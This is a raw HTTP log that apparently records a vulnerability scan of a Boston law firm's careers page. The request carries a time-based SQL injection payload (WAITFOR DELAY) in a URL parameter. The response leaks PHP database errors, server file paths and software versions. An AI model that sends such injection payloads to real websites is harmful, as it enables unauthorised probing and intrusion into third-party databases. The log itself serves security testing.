GET /careers.php?CategoryID=%27;WAITFOR%20DELAY%20%270:0:25%27--&CareerID=17&SectionID=380 HTTP/1.1 Referer: http://www.nutter.com/careers.php?CategoryID=23 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.nutter.com Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Wed, 20 Apr 2011 01:10:24 GMT Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch X-Powered-By: PHP/4.4.9 Transfer-Encoding: chunked Content-Type: text/html <!-- careers start --><br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" ><head><meta name="google-site-verification" content="aSIXeItWGw2SQPO6rIkdjASym5HnHabHM71ZCR6d0oU" /><br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><!--Careers : --> <title>Careers : </title><!-- <meta name="keywords" content="" /> <meta name="description" content="" />--> <meta name="keywords" content="" /> <meta name="description" content="" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.main.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/custom.css.php" media="screen" /><!-- <link rel="Stylesheet" rev="Stylesheet" href="/custom.temp.css" media="screen" /> --> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.careers.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.main.css" media="print" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.careers.css" media="print" /> <link rel="icon" type="image/png" href="/media/images/NM-favicon.ico" /><script src="_libs/libs.global.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.flash-fix.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.subCategories.js" type="text/javascript" language="javascript"></script><script type="text/javascript">// topnav_biographies_off= new Image();// topnav_biographies_off.src = "/maintenance/media/topnav_biographies.gif";</script></head><body><!-- header start --> <div id="printHeader"> <img src="http://www.nutter.com/media/images/nutter_logo_print.gif"/> </div> <div id="bodyContainer"> <div id="headerArea"> <ul> <li><a href="http://www.nutter.com/home.php" title="Home" onmouseover="rollover('Home', 'http://www.nutter.com/media/images/home_over.gif')" onmouseout="rollover('Home', 'http://www.nutter.com/media/images/home.gif')"><img src="http://www.nutter.com/media/images/home.gif" alt="Home" name="Home"/></a></li> <li><a href="http://www.nutter.com/contact.php" title="Contact Us" onmouseover="rollover('contact', 'http://www.nutter.com/media/images/contact_us_over.gif')" onmouseout="rollover('contact', 'http://www.nutter.com/media/images/contact_us.gif')"><img src="http://www.nutter.com/media/images/contact_us.gif" alt="Contact Us" name="contact"/></a></li> <li><label for="Search" onmouseover="rollover('search', 'http://www.nutter.com/media/images/search_over.gif')" onmouseout="rollover('search', 'http://www.nutter.com/media/images/search.gif')"><img src="http://www.nutter.com/media/images/search.gif" alt="Search" name="search"/></label></li> </ul> <form method="get" id="searchField" action="http://www.nutter.com/search.php"> <div id="siteSearch"> <input type="text" name="query" id="Search"/><input type="image" src="/media/images/button_arrow_blue.gif" name="Submit" title="Go" id="Submit"/> </div> </form> </div> <!-- header end --> <!-- body start --><!-- 2009.10.5, Ye Wang: Debug db <div style="border:2px solid green; display:block;clear:both;float:none;margin:5em 0;margin-bottom:1em"> <br clear="all" /></div><br clear="all" /> ---> <!-- END OF DEBUGGING --><div id="Container"> <br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><!-- Start Right Ads --><div id="Ads"><!-- dkoleba 2010/11/10 start --><!-- dkoleba 2010/11/10 end --></div><!-- End Right Ads --> <div id="mainContent"> <br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><br /><b>Notice</b>: Undefined offset: 1 in <b>/usr/local/apache/htdocs/_templates/templates.careers.php</b> on line <b>50</b><br /><br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><br /><b>Notice</b>: Undefined offset: 1 in <b>/usr/local/apache/htdocs/_templates/templates.careers.php</b> on line <b>75</b><br /><br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><h2></h2><br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><ul id="categoryNav"> </ul> <div id="subNav" class="Raised" style="cursor: default;"><!-- dkoleba 2010/11/11 start --> <a href="http://www.nutter.com/media/news/media.669.pdf" target="_blank" style="margin-top: 15px; margin-left: 11px; border: 0;"><img src="../media/images/Midlevel_2010_Nutter2_114v1.jpg" width="114" border="0"></a><!-- <a href="/publications_events.php?NewsID=689" style="border-bottom: 0px;"><img src="../media/images/2008BestPlaces.jpg" alt="Best Places to Work - Boston Business Journal 2008" width="86" height="86" border="0" style="margin-top: 15px; margin-left: 25px;"></a><br/> <a href="../media/images/media.bestplacetowork.pdf" target="_blank" style="border-bottom: 0px;"><img src="../media/images/marketinglogocolorfinal.jpg" alt="The Boston Globe - GLOBE100's - Top Places to Work '08" width="86" height="86" border="0" style="margin-top: 15px; margin-left: 25px;"></a>dkoleba 2010/11/11 end --></div><br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><div id="NarrativeText"></div> </div><h1><a href="http://www.nutter.com/home.php" title="Nutter McClennen & Fish"><span>Careers : </span></a></h1><div id="Navigation"> <a href="http://www.nutter.com/about.php" title="ABOUT US" onmouseover="rollover('about', 'http://www.nutter.com/media/leftNav/about_over.gif')" onmouseout="rollover('about', 'http://www.nutter.com/media/leftNav/about.gif')"><img src="http://www.nutter.com/media/leftNav/about.gif" name="about" alt="ABOUT US"/></a><a href="http://www.nutter.com/client_services.php" title="CLIENT SERVICES" onmouseover="rollover('client_services', 'http://www.nutter.com/media/leftNav/client_services_over.gif')" onmouseout="rollover('client_services', 'http://www.nutter.com/media/leftNav/client_services.gif')"><img src="http://www.nutter.com/media/leftNav/client_services.gif" name="client_services" alt="CLIENT SERVICES"/></a><a href="http://www.nutter.com/attorneys.php" title="ATTORNEYS" onmouseover="rollover('attorneys', 'http://www.nutter.com/media/leftNav/attorneys_over.gif')" onmouseout="rollover('attorneys', 'http://www.nutter.com/media/leftNav/attorneys.gif')"><img src="http://www.nutter.com/media/leftNav/attorneys.gif" name="attorneys" alt="ATTORNEYS"/></a><a href="http://www.nutter.com/publications_events.php" title="PUBLICATIONS & EVENTS" onmouseover="rollover('publications_events', 'http://www.nutter.com/media/leftNav/publications_events_over.gif')" onmouseout="rollover('publications_events', 'http://www.nutter.com/media/leftNav/publications_events.gif')"><img src="http://www.nutter.com/media/leftNav/publications_events.gif" name="publications_events" alt="PUBLICATIONS & EVENTS"/></a><a href="http://www.nutter.com/careers.php" title="CAREERS" onmouseover="rollover('careers', 'http://www.nutter.com/media/leftNav/careers_over.gif')" onmouseout="rollover('careers', 'http://www.nutter.com/media/leftNav/careers_over.gif')"><img src="http://www.nutter.com/media/leftNav/careers_over.gif" name="careers" alt="CAREERS"/></a><a href="http://www.nutter.com/offices.php" title="OFFICES" onmouseover="rollover('offices', 'http://www.nutter.com/media/leftNav/offices_over.gif')" onmouseout="rollover('offices', 'http://www.nutter.com/media/leftNav/offices.gif')"><img src="http://www.nutter.com/media/leftNav/offices.gif" name="offices" alt="OFFICES"/></a><a href="http://www.nutter.com/client_services.php?SectionID=2" title="NUTTER INVESTMENT ADVISORS" onmouseover="rollover('advisors', 'http://www.nutter.com/media/leftNav/advisors_over.gif')" onmouseout="rollover('advisors', 'http://www.nutter.com/media/leftNav/advisors.gif')"><img src="http://www.nutter.com/media/leftNav/advisors.gif" name="advisors" alt="NUTTER INVESTMENT ADVISORS"/></a> </div></div><!-- body end --> <!--- sIFR script ---><script type="text/javascript">//<![CDATA[// Load the sIFR font for the feed's title.if(typeof sIFR == "function"){ sIFR.replaceElement(named({sSelector:"h1", sFlashSrc:"./_sifr/century.swf", sColor:"#244185", sHoverColor:"#666666", sBgColor:"#ffffff", sFlashVars:""})); //sIFR.replaceElement(named({sSelector:"h1", sFlashSrc:"./_sifr/georgia.swf", sColor:"#244185", sHoverColor:"#666666", sBgColor:"#ffffff", sFlashVars:""}));};//]]></script> <!-- footer start --> <div id="footerArea"> <span>Copyright © 2011 Nutter McClennen & Fish LLP. All rights reserved.</span> <span>Boston, Massachusetts, USA 617.439.2000 | Hyannis 508.790.5400</span> <span id="footerLinks">See DISCLAIMER on front page | <a href="http://www.nutter.com/sitemap.php" title="Site Map">Site Map</a></span> <span id="footerSite">www.nutter.com</span> </div> <!-- footer end --> </div> </body> </html> <!-- careers end -->